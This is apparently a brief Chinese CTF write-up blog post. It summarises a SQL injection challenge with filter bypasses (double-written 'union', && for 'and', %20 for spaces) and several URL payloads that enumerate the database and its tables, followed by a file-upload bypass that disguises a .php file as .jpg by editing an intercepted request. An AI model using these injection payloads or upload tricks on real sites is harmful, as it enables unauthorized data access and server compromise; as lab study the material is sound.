总结

SQL

观察源码发现包含and union 空格的过滤

union通过双写绕过

and用&&代替

空格用%20代替

确定闭合

?id=1'%20--+

确定显示位

?id=1'%20uniunionon%20select%201,2,3,4%20--+

查询库名

?id=1'%20uniunionon%20select%201,database(),3,4%20--+

查询表名

?id=1'%20uniunionon%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=database()--+

观察源码只能上传图片

将 .php 格式改为 .jpg

通过抓包修改上传的格式

名字为 give_me_flag

posted @ 2024-12-30 19:42 llz233 阅读(19) 评论(0) 收藏举报

刷新页面返回顶部